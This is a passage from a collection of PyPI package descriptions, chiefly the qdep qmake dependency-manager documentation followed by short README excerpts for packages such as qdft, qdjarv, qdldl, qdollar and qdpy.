tags. If you leave out the version, qdep will automatically query the corresponding repository and get the latest tag (by \"creation\") and use that one. If you do specify a version, it can either be a git tag or a git branch. In case of a tag, qdep will simply download it and assume it to be persistant, i.e. never check for updates on that specific tag. Referencing a branch however will lead to qdep \"tracking\" that branch, and before every build, qdep pulls on the branch to update if neccessary.Generelly speaking, it is recommended to use explicit tags. Implicit versioning is fine, too, but updates to packages might break your builds at times you do not want them to. Branch versioning is always dangerous and should only be used on explicitly stable branches or for package delevopment.Package-uniqueness and version conflictsWhen working with recursive package dependencies, it can sometimes happen that two different packages include different versions of the same package. qdep circumvents this issue by making shure only a single version of each package is ever included. The first version this is referenced is the one that is choosen. Explicit package paths however are not considered the same package, i.e. it is possible to include two different pri files from the same git repository. Generelly speaking, a packages unique identifier is determined by itsand its- both case insensitive.Normal dependenciesNormal dependencies, aka pri-dependencies specified viaQDEP_DEPENDSare the primary dependency type of qdep. They are typically resolve to a simple pri files, that is included into your project by qdep. You can do anything in these pri files you would also in a \"normal\" pri file. However, there are a few extra things that become possible when including qdep dependencies.TranslationsThe first feature is extended support for translations. Qdep packages can come with translation source files for their own sources. These are typically exported via theQDEP_TRANSLATIONSqmake variable. When creating your own translations, qdep will automatically merge these with your own translations at build time. This however onyl works if you make use of thelreleaseqmake feature, provided by qt. SeeQMake TRANSLATIONSandQMake QM_FILES_INSTALL_PATfor more details.Library supportWhen using qdep in static or dynamic libraries, there are often special steps needed to make that fully work. However, qdep takes care of those steps and performs them for you. The only thing you need to do is enable library exports from your library and then import that export from your primary project. For example, assuimg you have the following project structure:root (subdirs)\n |-library (lib)\n |-app (app)And you have a library that depends on QHotkey. If you want to use this library from app, you would create the library pro file as follows:TEMPLATE = lib\nCONFIG += static # dynamic libraries are also possible, but dependencies must support exporting for them to work on windows\n\n# ...\n\nQDEP_DEPENDS += Skycoder42/QHotkey\nQDEP_EXPORTS += Skycoder42/QHotkey\nCONFIG += qdep_link_export\n!load(qdep):error(\"Failed to load qdep feature\")And then reference the library in the app pro file. This also takes care of linking the library to the app, so no additionalINCLUDEPATHorLIBSchanges are needed:TEMPLATE = app\n\n# ...\n\nQDEP_LINK_DEPENDS += ../library\n!load(qdep):error(\"Failed to load qdep feature\")And thats it! You can now use the QHotkey in the library and the app project without any additional work, as qdep will reference the QHotkey that is now embedded into the library project.Note:This will also work for dynamic librabries, but only if theexplicitlysupport qdep package exporting. If not, linking will fail at least on windows, and possibly on other platforms as well.Creating normal dependenciesThis section is intended for developers that want to create their own qdep packages. Generally speaking, there is not much you need to do different from creating normal pri includes. However, there are a few small things in qdep you can use to your advantage to create better packages. They are described in the following sub sections and are:Translation generationResources and startup hooksautomatic exportsCreating qdep translationsThe only difference when creating translations with qdep is where you put them. Instead of TRANSLATIONS, create a qmake variable called QDEP_TRANSLATIONS and add all the ts files you want to generate to it. Next, call the following command to actually generate the ts-files based on your pri file:qdeplupdate--qmake\"\"--pri-file\"\"[--...]And thats it. You should now be able to find the generated TS-files where you wanted them to be as specified in the pri file.When creating packages that should work with and without qdep, you can add the following to your pri file to still make these translations available if the package is included without qdep:!qdep_build: EXTRA_TRANSLATIONS += $$QDEP_TRANSLATIONSResources and hooksOne thing that can be problematic, especially when working with static libraries, is the use of RESOURCES and startup hooks. To make it work, qdep automatically generates code to load them. For resources, there is nothing special you need to do as package developer.For hooks however, thats a different story. Assuming you have the following function you want to be run asQ_COREAPP_STARTUP_FUNCTION:voidmy_package_startup_hook(){doStuff();}You will have to add the following line to your qdep pri file to make shure this hook actually gets called:QDEP_HOOK_FNS += my_package_startup_hookAnd with that, qdep will automatically generate the code needed to call this method asQ_COREAPP_STARTUP_FUNCTION.When creating packages that should work with and without qdep, you can add the following to the cpp file that contains the hook function to make it work for non-static projects, even if the package is included without qdep:#ifndef QDEP_BUILD#includeQ_COREAPP_STARTUP_FUNCTION(my_package_startup_hook)#endifAutomatic exportsAnother very useful tool are automatic package exports. This allows qdep to automatically export a qdep package from a dynamic library, so other applications that link to that library can use the exported qdep packages API. This is basically equivalent to the following:#ifdef BUILD_PACKAGE_AS_LIBRARY#ifdef IS_DLL_BUILD#define MY_PACKAGE_EXPORT Q_DECL_EXPORT#else#define MY_PACKAGE_EXPORT Q_DECL_IMPORT#endif#else#define MY_PACKAGE_EXPORT#endifclassMY_PACKAGE_EXPORTMyClass{// ...};qdep basically automates the define part, so you don't have to care about correctly defining all those macros and your code can be reduced to:classMY_PACKAGE_EXPORTMyClass{// ...};To make it work, simply add the following to your pri file:QDEP_PACKAGE_EXPORTS += MY_PACKAGE_EXPORTAnd thats it! When using the package normally, qdep will automatically add an empty define that defines MY_PACKAGE_EXPORT to nothing. When building a dynamic library and the end user wants to export the package, it gets defined as Q_DECL_EXPORT (and Q_DECL_IMPORT for consuming applications).When creating packages that should work with and without qdep, you can add the following to the pri file to manually define the macro to nothing, even if the package is included without qdep:!qdep_build: DEFINES += \"MY_PACKAGE_EXPORT=\"Project dependenciesAnother side of qdep besides normal pri dependencies are full project dependencies. In this scenario, you include a full qmake project into your tree as child of a SUBDIRS projects. This allows the use of qdep package export pri files to link to these projects without much effort. To make use of this feature, you have to use a subdirs project that references the pro dependency, as well as normal projects that link against it. One great advantage of using project dependencies is, that they can reference other project dependencies they depend on, which means even for full projects, qdep takes care of the recursive dependency resolving for you.To get started, assume the following project structure:root (subdirs)\n |--libs (subdirs)\n | |--lib (lib)\n |--app (app)Both lib and app are assumed to depend on a theoretical qdep project dependency nameSkycoder42/SuperLib, but app also depends on lib.The first step would be to choose a subdirs project to add the dependency to. For this example, the libs project is choosen. Add the following lines to add the dependency:TEMPLATE = subdirs\nSUBDIRS += lib\n\n# ....\n\nQDEP_PROJECT_SUBDIRS += Skycoder42/SuperLib\nlib.qdep_depends += Skycoder42/SuperLib\n!load(qdep):error(\"Failed to load qdep feature\")TheQDEP_PROJECT_SUBDIRSis used to actually pull in the project dependency, while adding it tolib.qdep_dependsonlymakes sure that the qdep dependency is built before lib. This is not needed if lib does not depend on the qdep dependency. It is however recommended to always have a seperate subdirs project for qdep dependencies, i.e. for this concrete example it would be better to move the lib project one stage up or create another subdir project within libs that references the qdep dependencies.Next, we need to reference the library itself in app/lib. The procedure is the same for both, so here it is only shown for the app project as an example. In the app pro file, add the lines:QDEP_PROJECT_ROOT = libs # Or \"./libs\" - would be \"..\" for the lib project\nQDEP_PROJECT_LINK_DEPENDS += Skycoder42/SuperLib\n!load(qdep):error(\"Failed to load qdep feature\")QDEP_PROJECT_ROOTtells qdep where the project is located, that contains the reference to the actual qdep project dependency, andQDEP_PROJECT_LINK_DEPENDSlist all the dependencies this project (app) depends on. If any dependency listed there was not specified in the libs project viaQDEP_PROJECT_SUBDIRS, the build will fail.And with that, the project dependency has been sucessfully added and referenced. With the next build, the project would be downloaded, compiled and linked against app/lib.Creating project dependenciesGenerally speaking, project dependencies are just normal qmake projects. However, such a project shouldalwaysinclude the qdep feature and addqdep_link_exportto the config, as without the generated export pri file, it will not be usable as qdep project dependency. But besides that, you can do anything you want, i.e. add other normal qdep pri dependencies etc. and even export them if needed.However, there is one additional feature that is only possible with qdep project dependencies: You can directly reference other qdep project dependencies. Doing so will make sure that whichever subdirs project that includes this project will also include the dependencies as subdirs and ensure the qmake build order, as well as referencing the corresponding export pri files. To for example referenceSkycoder42/SuperLibfrom within a qdep project dependency, add the following:QDEP_PROJECT_DEPENDS += Skycoder42/SuperLib\n!load(qdep):error(\"Failed to load qdep feature\")DocumentationIn the following sections, all the functions, variables etc. of qdep are documented for reference.Command line interfaceqdep has a public and a private command line API. The public API is intended to be used by delevopers, while the internal API is used by the qdep qmake feature to perform various operations. The following sections list all the commands with a short description. For more details on each command, typeqdep --helpPublic API operations:prfgen Generate a qmake project feature (prf) for the given qmake.\ninit Initialize a pro file to use qdep by adding the required lines.\nlupdate Run lupdate for the QDEP_TRANSLATION variable in a given pri\n file.\nclear Remove all sources from the users global cache.\nversions List all known versions/tags of the given package\nquery Query details about a given package identifier\nget Download the sources of one ore more packages into the source\n cache.\nupdate Check for newer versions of used packages and optionally update\n them.Private API operations:dephash Generated unique identifying hashes for qdep\n packages.\npkgresolve Download the given qdep package and extract relevant\n information from it.\nhookgen Generate a header file with a method to load all\n resource hooks.\nhookimp Generate a source file that includes and runs all\n qdep hooks as normal startup hook.\nlconvert Combine ts files with translations from qdep\n packages.\nprolink Resolve the path a linked project dependency would\n be at.QMAKE-FeatureThis is the documentation of the qmake feature that is generated by qdep and loaded by addingload(qdep)to your project. All variables, CONFIG-flags and more are documented below.VariablesCommon VariablesNameDirectionDefaultDescriptionsQDEP_PATHin/outHolds the path to the qdep binary to be used. Can be overwritten to specify a custom locationsQDEP_VERSIONoutThe version of qdep which was used to generate the qdep featureQDEP_GENERATED_DIRin$$OUT_PWDThe sub-directory in the build folder where qdep should place all it's generated files. Can be an absolute or relative pathQDEP_EXPORT_PATHin$$QDEP_GENERATED_DIR/The directory where to place export pri files for libraries that export dependencies. Can be relative to OUT_PWD or absolute. Use QDEP_EXPORT_NAME to get the name of that file without a pathQDEP_DEPENDSinSpecify all dependencies to qdep packages to be included into your projectQDEP_LINK_DEPENDSinReference other projects in the same build tree that this project should link against. Those projects must be exporting a pri fileQDEP_PROJECT_SUBDIRSinSpecify all dependencies to qdep projects to be added as qmake project to the SUBDIRS variable. Only evaluted in projects that specify TEMPLATE assubdirsQDEP_PROJECT_ROOTinThe path to a project qmake project directory or file to resolve QDEP_PROJECT_LINK_DEPENDS againstQDEP_PROJECT_LINK_DEPENDSinSepcify all dependencies to qdep projects this project should be linked against. The dependencies are assumed to be provided in that project via QDEP_PROJECT_SUBDIRS.QDEP_DEFINESinSpecify DEFINES that are exported if the library exports a pri file. All values are automatically added to DEFINES by qdepQDEP_INCLUDEPATHinSpecify INCLUDEPATHS that are exported if the library exports a pri file. All values are automatically added to INCLUDEPATH by qdepQDEP_LIBSinSpecify LIBS that are exported if the library exports a pri file. All values are automatically added to LIBS by qdepQDEP_EXPORTSinSpecify qdep dependencies of which the API should be exported. Can be useful to export packages when used in dynamic libraries - only works if packages explicitly support thisQDEP_LUPDATE_INPUTSinAdditional files or folders to parse for translations when runningmake lupdateQDEP_PACKAGE_EXPORTSin (pkg)Variables to be defined as import/export/nothing and be used as prefix to a class.QDEP_TRANSLATIONSin (pkg)Specify translation subfiles within a qdep dependency to be merged with the translations of the project they are included fromQDEP_PROJECT_DEPENDSin (pkg)Specify all dependencies to qdep projects this qdep project depends on. Can only be used in qdep project dependencies and adds it's contents to QDEP_PROJECT_SUBDIRS of the project that includes this dependencyQDEP_VAR_EXPORTSin (pkg)Specify the names of additional qmake variables that should be exported from a qdep dependency besides DEFINES and INCLUDEPATHSUBDIRS extensionqdep_depends: Can be added to any variable passed toSUBDIRSin a project that usesQDEP_PROJECT_SUBDIRSto specify that a certain subdir project depends on that specific package. This doesnottake care of linkage etc. It only ensures that the make targets are build in the correct order.Advanced VariablesNameDirectionDefaultDescriptionsQDEP_TOOLin/outThe escaped command line base for qdep commands run from within qmakeQDEP_CACHE_SCOPEinstashThe method of caching to be used to cache various qmake related stuff. Can be , super or stashQDEP_GENERATED_SOURCES_DIRout$$QDEP_GENERATED_DIR/The directory where generated source files are placed. Is determined by the build configuration to take debug/release builds into accountQDEP_GENERATED_TS_DIRin$$QDEP_GENERATED_DIR/.qdepts/The directory where generated translation sources are placed.QDEP_LUPDATEinlupdate -recursive -locations relativeThe path to the lupdate tool and additional arguments for lupdate in themake lupdatecommand to control it's behaviourQDEP_LCONVERTinlconvert -sort-contextsThe path to the lconvert tool and additional arguments to be used to combine translationsQDEP_EXPORT_NAMEin/out_export.priThe name of a generated library import file. Must be only the name of the file, use QDEP_EXPORT_PATH to specify the locationQDEP_EXPORTED_DEFINESoutDEFINES that come from QDEP_PACKAGE_EXPORTS or DEFINES from any directly included qdep dependencyQDEP_EXPORTED_INCLUDEPATHoutINCLUDEPATHs that come from any directly included qdep dependencyQDEP_EXPORTED_LIBSoutLIBS that come from any directly included qdep dependencyQDEP_HOOK_FNSoutHolds all names of functions to be run as startup hook by qdepConfiguration valuesInput valueqdep_force: Enforce the full evaluation of qdep, even if the pro file is beeing evaluated without a context (This is potentially dangerous and should not be used unless absolutely neccessary)qdep_no_pull: Do not pull for newer versions of branch-based dependencies. Cloning new packages will still workqdep_no_clone: Do not clone completely new packages or package versions. Pulling on already cached branches will still workqdep_no_cache: Do not cache the used versions of packages without a specified versions. Instead the latest version is queried on every runqdep_export_all: export all dependant packages, i.e. any QDEP_PACKAGE_EXPORTS for every package are treated as if added to QDEP_EXPORTSqdep_no_link: When exporting packages from a library, do not add the qmake code to link the library (and to it's includes) to the generate export.pri fileqdep_no_qm_combine: Do not combine TRANSLATIONS with QDEP_TRANSLATIONS. Instead treat QDEP_TRANSLATIONS as EXTRA_TRANSLATIONS and generate seperate qm files for themqdep_link_export: Enforce the creation of an export pri file. Normally only libraries without qdep_no_link defined or projects that specify qdep_export_all or have values in QDEP_EXPORTS generate such filesqdep_no_export_link: Do not export contents of QT, PKGCONFIG or QDEP_LIBS in a generated export pri fileOutput valuesqdep_build: Is set in case the qdep features was loaded correctly and is enabledDefinesQDEP_BUILD: Is defined in case the qdep features was loaded correctly and is enabledEnvironment variablesQDEP_CACHE_DIR: The directory where to cache downloaded sources. Is automatically determined for every system but can be overwritten with this variableQDEP_SOURCE_OVERRIDE: Allows to provide a mapping in the format;^;. This will make qdep automatically replace any occurance ofpkg1withpkg2etc. Can be used by developers to temporarily overwrite packagesQDEP_DEFAULT_PKG_FN: A template that is used to resolve non-url packages likeUser/packageto a full url. The default method for that ishttps://github.com/{}.git- with{}being replaced by the short package name.Public make targetsmake lupdate: Runs thelupdatetool to update your translations in a quick and easy manner, without having to rely on potentially buggy pro-file-parsing.InternalVariables__QDEP_PRIVATE_SEPERATOR: Seperator between datasets__QDEP_TUPLE_SEPERATOR: Seperator between values within a dataset__QDEP_INCLUDE_CACHE: objects with details about included depdendencies of all kinds__QDEP_ORIGINAL_TRANSLATIONS: All original translation that were in TRANSLATIONS before apply translation combination with QDEP_TRANSLATIONS from included packages__QDEP_HOOK_FILES: Paths to header files that contain hook definitions that must be included and loaded by a project__QDEP_EXPORT_QMAKE_INCLUDE_GUARD: a cache of included exported pri files to ensure each gets included only onceConfiguration values__qdep_script_version: The version detected at runtime as reported by the qdep executable__qdep_dump_dependencies: Create a file named qdep_depends.txt in the build directory that contains all direct dependencies of the projectQMAKE test functionsqdepCollectDependencies(dependencies ...): Downloads all specified normal dependencies and adds them to__QDEP_INCLUDE_CACHEto be linked later by qdep. Works recursivelyqdepCollectProjectDependencies(dependencies ...): Downloads all specified project dependencies and adds them toSUBDIRS. Works recursivelyqdepResolveSubdirDepends(subdir-vars ...): Converts the values of theqdep_dependssubvar of all variables passed to the function to normal subdirsdependssubvarsqdepCreateExportPri(path): Creates a file named path and adds all export-related code to itqdepShellQuote(paths ...): Makes the given paths absolute based on_PRO_FILE_PWD_and escapes them usingshell_quoteqdepDumpUpdateDeps(): Creates a file named qdep_depends.txt in the build directory that contains all direct dependencies of the projectQMAKE replace functionsqdepResolveProjectLinkDeps(project-root, link-depends ...): Resolves all link-depends project packages to subdir paths, assuming they are provided by the project located at project-rootqdepOutQuote(name, values): Creates a number of lines of qmake code that assing each value in values to a variable named name, in a securely quoted mannerqdepLinkExpand(path): Expands a shortened or relative path to a project that exports dependencies to get the path of the export pri fileqdepResolveLinkRoot(path): Searches for a top-level qmake project, that has this project included as project dependency and returns the path to that pro file. Search is started based on path, which must be a build directory"} +{"package": "qdft", "pacakge-description": "Constant-Q Sliding DFT in C++ and Python (QDFT)Forward and inverse Constant-Q Sliding DFT according to[1]with following features:Arbitrary octave resolution (quarter toneby default)Built-in parameterizable cosine family window (Hann by default)Customizable time and frequency domain data type in C++Endless single or multiple sample processing at onceOptional analysis latency control parameterReal-time analysis and synthesis capabilityThe Constant-Q Sliding Discrete Fourier Transform (QDFT) is a recursive approach to compute the Fourier transform sample by sample. This is an efficient implementation without the FFT calculus. Just define an arbitrary frequency range and octave resolution to obtain the corresponding DFT estimate. In contrast to the linearSDFT, frequency bins of the QDFT are logarithmically spaced. Thus, both high and low frequencies are resolved with the same quality, which is particularly useful for audio analysis. Based on the QDFT, a chromagram feature with detailed instantaneous frequency estimation is planned for the future release.WIPReadmeDocstringsPyPI packageqdftSlidingchromagramas a bonus (a draft is already included in the Python package)Basic usageC++#include// see also src/cpp folderdoublesr=44100;// sample rate in hertzstd::pairbw={50,sr/2};// lowest and highest frequency in hertz to be resolveddoubler=24;// octave resolution, e.g. number of DFT bins per octaveQDFTqdft(sr,bw,r);// create qdft plan for custom time and frequency domain data typessize_tn=...;// number of samplessize_tm=qdft.size();// number of dft binsfloat*x=...;// analysis samples of shape (n)float*y=...;// synthesis samples of shape (n)std::complex*dft=...;// dft matrix of shape (n, m)qdft.qdft(n,x,dft);// extract dft matrix from input samplesqdft.iqdft(n,dft,y);// synthesize output samples from dft matrixThe time domain data type defaults tofloatand the frequency domain data type todouble.PythonfromqdftimportQDFT# see also src/python foldersr=44100# sample rate in hertzbw=(50,sr/2)# lowest and highest frequency in hertz to be resolvedr=24# octave resolution, e.g. number of DFT bins per octaveqdft=QDFT(sr,bw,r)# create qdft plann=...# number of samplesm=qdft.size# number of dft bins (if need to know in advance)x=...# analysis samples of shape (n)dft=qdft.qdft(x)# extract dft matrix of shape (n, m) from input samplesy=qdft.iqdft(dft)# synthesize output samples from dft matrixFeel free to obtain current version fromPyPIby executingpip install qdft.ExamplesQDFTChroma12face.pycmajor.pySee alsoIf you're interested in Sliding DFT withlinearfrequency resolution, don't forget to browse myjurihock/sdftproject!ReferencesRussell Bradford et al. (2008). Sliding with a Constant Q. International Conference on Digital Audio Effects.https://www.dafx.de/paper-archive/2008/papers/dafx08_63.pdfRussell Bradford et al. (2005). Sliding is Smoother Than Jumping. International Computer Music Conference Proceedings.http://hdl.handle.net/2027/spo.bbp2372.2005.086Eric Jacobsen and Peter Kootsookos (2007). Fast, Accurate Frequency Estimators. IEEE Signal Processing Magazine.https://ieeexplore.ieee.org/document/4205098Licensegithub.com/jurihock/qdftis licensed under the terms of the MIT license.\nFor details please refer to the accompanyingLICENSEfile distributed with it."} +{"package": "qdi", "pacakge-description": "Dependency injection the library for python"} +{"package": "qdict", "pacakge-description": "No description available on PyPI."} +{"package": "qdill", "pacakge-description": "qdilla VERY minimal python convenience library for dillare youtiredof writingwith open(...) as fevery time you try and use pickle/dill as you're hacking something together in python?this is the library for you.it defines some simple functions over dill so that you can just dovar = qdill.load(filename)ORqdill.save(thing, filename)There's also a thirddefaultLoadfunction.It checks if the file exists, and if the file doesn't exist, it saves the default thing to the file AND returns the default thing.\ni.e.var = qdill.defaultLoad(default_thing, filename)you can read the code. it's all just ~25 lines in the__init__.pyif you need more fine-grained control of dill...Don't use this 'library'"} +{"package": "qdiv", "pacakge-description": "No description available on PyPI."} +{"package": "qdj", "pacakge-description": "QDJ isdjango-admin.pystartproject, but with your own templates.\nThe project starter for obsessives with deadlines.Install qdj:# pip install qdjCreate a project template:# qdj createCreated Django 1.3 template in/Users/nath/.qdj/1.3Check out the template:# cd~/.qdj/1.3# find../hooks.py./files./files/settings.py./files/manage.py./files/urls.py./files/__init__.pyAdd a dynamic requirements file:# echo >>files/requirements.txt \"django == {{ django_version }}\"Start a new project using our template:# cd /tmp# qdj start myprojectShow the created files:# find myprojectmyprojectmyproject/requirements.txtmyproject/settings.pymyproject/manage.pymyproject/urls.pymyproject/__init__.py"} +{"package": "qdjarv", "pacakge-description": "Quick and dirty jsonapi response validatorA library for validating jsonapi responses and simplifying their handling.What it does:Validates that types have the fields you want, of the type you want.Links resources together.Validates that resources you wanted included, are included.Pulls up relationships and attributes one level up, to resource object level.What it doesn't do:Validate that response is valid jsonapi. Use jsonapi's jsonschema.Build requests or handle http codes.ORM.UsageHere's example usage:# Start by defining your typesfromqdjarvimportValidator,Type,Rel,ValidationError# Field value can be any callable that either returns a validated value or# throws.defType(t):defv(o):ifisinstance(o,t):raiseValidationErrorreturnoreturnvtypes={\"articles\":{\"title\":Type(str),\"author\":Rel(\"people\"),# One-to-one relation.\"comments\":Rel([\"comments\"]),# One-to-many relation.},\"people\":{\"firstName\":Type(str),\"lastName\":Type(str),\"weight\":Type([int])},\"comments\":{\"body\":Type(str),\"author\":Rel(\"people\")}}# If you're using sparse fields, define those, too.fields={\"articles\":[\"title\",\"author\"],\"people\":[\"firstName\",\"lastName\"]}# If you're using includes, also define them.# This is equivalent to 'author,author.comments'.include={\"author\":{\"comments\":{}}}# Also declare your toplevel type.top=[\"articles\"]# This is a list, single element would be just \"articles\".# Finally, create a validator.p=Validator(top,types,include=include,fields=fields)# Parsing modifies the received message, so make a copy if you want the# original!# Also remember to pass the message through jsonapi jsonschema first.# If something goes wrong, it will throw a qdjarv.ValidationError.parsed=p.validate(message)# If you don't feel like repeating yourself, you can get your get parameters# like so:fields_args=p.fields_args()include_args=p.include_args()Here's an example parsed message:{# Other toplevel stuff skipped for brevity.\"data\":[{\"type\":\"articles\",\"id\":\"1\",# Relationships and attributes were pulled out to this level.# You might want to access links and meta (and maybe# relationships / attributes), so they're kept with a dot# prepended.\".links\":{},\".meta\":{# ...}\".relationships\":{# ...}\".attributes\":{# ...},\"title\":\"JSON:API paints my bikeshed!\"\"author\":{\"links\":{# ...},\"data\":{# If this resource was included, we replaced the binding# with the object itself.# Watch out for loops!\"type\":\"people\",\"id\":\"9\",\".attributes\":{# ...},\".links\":{# ...},\"firstName\":\"Dan\",\"lastName\":\"Gebhardt\",\"twitter\":\"dgeb\"}},\"comments\":{# ...},}],\"included\":[# Included objects are still here, in case you wanted them. Also linked# and flattened.{\"type\":\"people\",\"id\":\"9\",# ...},# ...]}TODOTests.Turning types into requests, maybe."} +{"package": "qdk", "pacakge-description": "qdk.chemistry[!WARNING]This qdk.chemistry package is deprecated. Please seeAzure Quantum Elementsfor Azure Quantum's latest efforts in chemistry.Q# chemistry library's Python application layer, contains tools for creating 2D molecular diagrams and calculating their 3D geometry using RDKit.Installation and getting startedWe recommend installingAnacondaorMiniconda.First, install RDKit:condainstall-cconda-forgerdkitTo install theqdkpackage, runpipinstallqdkDevelopmentTo install the package in development mode, we recommend creating a new environment using the following command:# Create new conda environmentcondaenvcreate-fqdk/environment.ymlThen, the package can be installed after activating the environment:# Activate conda environmentcondaactivateqdk# Install package in development modepipinstall-eqdk"} +{"package": "qdk-sim-experimental", "pacakge-description": "No description available on PyPI."} +{"package": "qdl", "pacakge-description": "No description available on PyPI."} +{"package": "qdldl", "pacakge-description": "qdldl-pythonPython interface to theQDLDLfree LDL factorization routine for quasi-definite linear systems:Ax = b.InstallationThis package can be directly installed via pip,pip install qdldlUsageInitialize the factorization withimport qdldl\nF = qdldl.Solver(A)whereAmust be a square quasi-definite matrix inscipy sparse CSC\nformat.The algorithm internally converts the matrix into upper triangular format. IfAis already upper-triangular, you can specify it with the argumentupper=Trueto theqdldl.Solverconstructor.To solve the linear system for a right-hand sideb, just writex = F.solve(b)To update the factorization without changing the sparsity pattern ofAyou can runF.update(A_new)whereA_newis a sparse matrix in CSR format with the same sparsity pattern asA.The algorithm internally convertsA_newinto upper triangular format. IfA_newis already upper-triangular, you can specify it with the argumentupper=Trueto theF.updatefunction."} +{"package": "qdls", "pacakge-description": "qdls"} +{"package": "qdmap", "pacakge-description": "qdmapA python package for explosives safety quantity-distance spatial analysis.Free software: MIT licenseDocumentation:https://josh-spatial.github.io/qdmapFeaturesIN-PROGRESS Create a basic quantity-distance calculatorFirst injupyter notebookTODO Create QGIS PluginTODO Determine database type to use as a basis (PostGIS, GeoPackage, shapefiles?)TODO Create UI for pluginTODO Write spatial analysis (GeoPandas)CreditsThis package was created withCookiecutterand thegiswqs/pypackageproject template."} +{"package": "qdns", "pacakge-description": "# qdns\nA threaded DNS resolver for Python"} +{"package": "qdo", "pacakge-description": "qdo: Python worker library for Mozilla Services\u2019 message queuingqdopronouncedqu-doeThis is a Python implementation of a worker library used for processing\nqueued messages from a Mozilla Services message queue. The message queue is\ncalledQueueyand is implemented as aPyramidbased web service on top ofCassandra.DocumentationYou can read the documentation athttp://qdo.readthedocs.org/Changelog0.1 (2012-09-17)Initial release and feature scope."} +{"package": "qdollar", "pacakge-description": "qdollarqdollaris a python implementation of the$Q Super-Quick Recognizer.AboutThe $Q Super-Quick Recognizer is a 2-D gesture recognizer designed for rapid prototyping of gesture-based user interfaces, especially on low-power mobiles and wearables. It builds upon the $P Point-Cloud Recognizer but optimizes it to achieve a whopping 142\u00c3\u2014 speedup, even while improving its accuracy slightly. $Q is currently the most performant recognizer in the $-family. Despite being incredibly fast, it is still fundamentally simple, easy to implement, and requires minimal lines of code. Like all members of the $-family, $Q is ideal for people wishing to add stroke-gesture recognition to their projects, now blazing fast even on low-capability devices.InstallationTo installqdollarusing pippip install qdollarExamplefromqdollar.recognizerimportGesture,Recognizer,Pointt1=[Point(0,0,1),Point(1,1,1),Point(0,1,2),Point(1,0,2)]tmpl_1=Gesture('X',t1)tmpl_2=Gesture('line',[Point(0,0),Point(1,0)])templates=[tmpl_1,tmpl_2]gesture=Gesture('A',[Point(31,141,1),Point(109,222,1),Point(22,219,2),Point(113,146,2)])res=Recognizer().classify(gesture,templates)print(res[0].name)"} +{"package": "qdownloader", "pacakge-description": "No description available on PyPI."} +{"package": "qd-plot", "pacakge-description": "qdquick-draw: a cli plotting toolqdis a command line tool to quickly make plots from csv and json files or\nstreams. It is built on top of thepandasandplotlylibraries.Installation and usageqdcan be installed viapip install qd-plot. It requires Python 3.7+.Basic usageMake a quick plot using the first columns available and display the output in a gui\n(default web browser).catdata/trig.json|qd--guiBy defaultqdreads data fromstdinand writes image bytes tostdout, however it\nalso accepts input and output files as arguments, as well as the--guioption shown\nabove.qd-idata/trig.json-otrig.pngAll the cli functionality available can be seen via the--helpoption.qd--helpMacOS + iTerm2Sinceqdwrites to stdout by default, the images can be displayed right in the\nterminal window if using a compatible terminal, such as iTerm2 withimgcat:catdata/trig.json|qd|imgcatMore examplesMean in binsPlot the mean values in some bins specifying the x and y columns.catdata/trig.json|qd-xx-ysin,cos--mean--guiPercentile in binsPlot the 95th percentile values in 20 binscatdata/trig.json|qd-xx-ysin--quant-q95--nbins20--guiHistogram of valuesMake a histogram from two sets of data using 20 bins.catdata/dists.csv|qd-xgauss,expo--hist-n20--guiLocal DevelopmentClone this repo from github and in a virtual environment do the following:pipinstall.# installs qd based on local code changespipinstall-rrequirements-dev.txt# installs extra packages for dev and testingTests can be run via:pytest-n4"} +{"package": "qdpxlib", "pacakge-description": "qdpxlibThis isqdpxlib, a Python API for easy handling (importing and exporting) of QDPX (MAXQDA) files.InstallationYou can installqdpxlibusing pip:pipinstallqdpxlibUsageHere's a simple example of how to useqdpxlib:importjsonfromqdpxlibimportQDPXFileqdpx_file='path/to/qdpxfile.qdpx'output_json='output.json'output_qdpx='new_qdpx.qdpx'qdpx=QDPXFile(qdpx_file)# Export them as JSONwithopen(output_json,'w')asf:json.dump(qdpx.codings,f,indent=4)# Export new qdpx fileqdpx.export_qdpx(qdpx_file,output_qdpx)ContributingContributions are welcome! Please reach out tooyonay12@tamu.eduor make a pull request to contribute. We will post more detailed contribution guidelines soon.LicenseThis project is licensed under the MIT license."} +{"package": "qdpy", "pacakge-description": "Packageqdpyimplements recent Quality-Diversity algorithms: Map-Elites, CVT-Map-Elites, NSLC, SAIL, etc.\nQD algorithms can be accessed directly, butqdpyalso includes building blocks that can be easily assembled together to build your own QD algorithms. It can be used with parallelism mechanisms and in distributed environments.This package requires Python 3.6+.qdpyincludes the following features:Generic support for diverse Containers: Grids, Novelty-Archives, Populations, etcOptimisation algorithms for QD: random search methods, quasi-random methods, evolutionary algorithmsSupport for multi-objective optimisation methodsPossible to use optimisation methods not designed for QD, such as [CMA-ES](https://arxiv.org/pdf/1604.00772.pdf)Parallelisation of evaluations, using parallelism libraries, such as multiprocessing, concurrent.futures or [SCOOP](https://github.com/soravux/scoop)Easy integration with the popular [DEAP](https://github.com/DEAP/deap) evolutionary computation frameworkInstallqdpyrequires Python 3.6+. It can be installed with:pip3 install qdpyqdpyincludes optional features that need extra packages to be installed:cmafor CMA-ES supportdeapto integrate with the DEAP librarytablesto output results files in the HDF5 formattqdmto display a progress bar showing optimisation progresscoloramato add colours to pretty-printed outputsYou can installqdpyand all of these optional dependencies with:pip3 install qdpy[all]The latest version can be installed from the GitLab repository:pip3 install git+https://gitlab.com/leo.cazenille/qdpy.git@masterExampleFrom a python shell:from qdpy import algorithms, containers, benchmarks, plots\n\n# Create container and algorithm. Here we use MAP-Elites, by illuminating a Grid container by evolution.\ngrid = containers.Grid(shape=(64,64), max_items_per_bin=1, fitness_domain=((0., 1.),), features_domain=((0., 1.), (0., 1.)))\nalgo = algorithms.RandomSearchMutPolyBounded(grid, budget=60000, batch_size=500,\n dimension=3, optimisation_task=\"maximisation\")\n\n# Create a logger to pretty-print everything and generate output data files\nlogger = algorithms.AlgorithmLogger(algo)\n\n# Define evaluation function\neval_fn = algorithms.partial(benchmarks.illumination_rastrigin_normalised,\n nb_features = len(grid.shape))\n\n# Run illumination process !\nbest = algo.optimise(eval_fn)\n\n# Print results info\nprint(algo.summary())\n\n# Plot the results\nplots.default_plots_grid(logger)\n\nprint(\"All results are available in the '%s' pickle file.\" % logger.final_filename)Usage, DocumentationPlease to go the GitLab repository main page (https://gitlab.com/leo.cazenille/qdpy) and the documentation main page (https://leo.cazenille.gitlab.io/qdpy/).Author:Leo Cazenille, 2018-*License:LGPLv3, see LICENSE file."} +{"package": "qdrant", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qdrant-client", 